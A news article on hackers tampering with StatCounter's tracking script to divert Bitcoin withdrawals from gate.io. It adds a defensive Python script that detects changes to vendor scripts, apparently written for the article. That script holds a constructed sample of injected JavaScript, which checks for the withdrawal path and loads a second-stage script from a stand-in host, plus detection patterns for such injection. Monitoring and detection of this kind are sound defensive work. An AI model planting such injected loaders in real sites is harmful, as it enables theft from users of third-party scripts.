- The hijackers redirected Bitcoin withdrawals to a separate Bitcoin address
Hackers breached StatCounter, a leading web traffic analytics service, and secretly injected malicious code into the firm’s main site-tracking script. The attackers used it to steal Bitcoin from the gate.io cryptocurrency exchange.
Malicious code inserted
ESET malware researcher Matthieu Faou, who discovered the hack, said the attack took place on November 3rd, and explained that the malicious code could hijack Bitcoin transactions executed through Gate.io’s web interface and divert the funds. The attackers modified the site-tracking script loaded by the exchange’s withdrawal page, as reported by ZDNet.
Faou said that although millions of websites could have pulled the changed code, the attackers appear to have targeted a single site, since the malicious code found within the StatCounter script performed only one check, for a specific path: myaccount/withdraw/BTC. Faou explained:
“The script targets a specific Uniform Resource Identifier (URI): myaccount/withdraw/BTC. It turns out that among the different cryptocurrency exchanges live at the time of writing, only gate.io has a valid page with this URI, thus, this exchange seems to be the main target of this attack.”
Whenever a visitor reached that path, the malicious code injected a second script, fetched from a different domain, which was then executed. That script tried to redirect Bitcoin transactions to one of the numerous wallets the attackers were using. The researchers could not establish the exact amount stolen, since the criminals used multiple wallets, though they believe the loss could have been significant. Neither Gate.io nor StatCounter had issued an official statement about the alleged incident.
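As an added example (not code from the article, ESET, StatCounter or Gate.io), the following Python script shows the kind of monitoring a site owner can run against a third-party tracking script it embeds: hash each fetched copy to detect any change, then scan a changed copy for the two constructs the injected code relied on, a check for the withdrawal path and a second-stage script loaded from another host. The sample script bodies, the trusted-host list and the host names are constructed for the example.

```python
import hashlib
import re

# Heuristics drawn from the incident described above: the tampered tracking
# script (1) checked the current URL for the withdrawal path and (2) loaded a
# second-stage script from a different domain.
WITHDRAW_PATH = re.compile(r"withdraw/BTC", re.IGNORECASE)
SCRIPT_INJECTION = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.IGNORECASE)
EXTERNAL_SRC = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


def sha256_hex(source: str) -> str:
    """Content hash used to notice any change to a third-party script."""
    return hashlib.sha256(source.encode()).hexdigest()


def scan_for_indicators(source: str, trusted_hosts: set) -> list:
    """Return the names of suspicious constructs found in a script body."""
    findings = []
    if WITHDRAW_PATH.search(source):
        findings.append("withdraw-path-check")
    if SCRIPT_INJECTION.search(source):
        findings.append("dynamic-script-injection")
    for host in EXTERNAL_SRC.findall(source):
        if host.lower() not in trusted_hosts:
            findings.append(f"untrusted-host:{host.lower()}")
    return findings


def triage(previous: str, current: str, trusted_hosts: set) -> dict:
    """Compare a freshly fetched copy of a script against the last-known-good copy."""
    changed = sha256_hex(previous) != sha256_hex(current)
    return {
        "changed": changed,
        "indicators": scan_for_indicators(current, trusted_hosts) if changed else [],
    }


# Constructed sample snapshots; these are not the real StatCounter code.
GOOD = ("var sc_project=1;(function(){var i=new Image();"
        "i.src='https://c.statcounter.com/t.php?sc='+sc_project;})();")
TAMPERED = GOOD + ("if(location.pathname.indexOf('myaccount/withdraw/BTC')!==-1)"
                   "{var s=document.createElement('script');"
                   "s.src='https://stage2.example/s.js';document.body.appendChild(s);}")
TRUSTED = {"c.statcounter.com"}  # hosts the embedding site expects the script to contact

if __name__ == "__main__":
    print(triage(GOOD, GOOD, TRUSTED))
    print(triage(GOOD, TAMPERED, TRUSTED))
```

In practice the "previous" copy is the snapshot stored at the last review and the "current" copy is re-fetched on a schedule, so a silent change to a vendor script surfaces as a finding instead of going unnoticed.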
Not the first such attack
StatCounter is used by over 2 million websites and monitors close to 10 billion pages every month, which could have been the attackers’ motivation. Faou added:
“This redirection is probably unnoticeable to the victims, since the replacement is performed after they click on the submit button […] thus, it will happen very quickly and would probably not even be displayed.”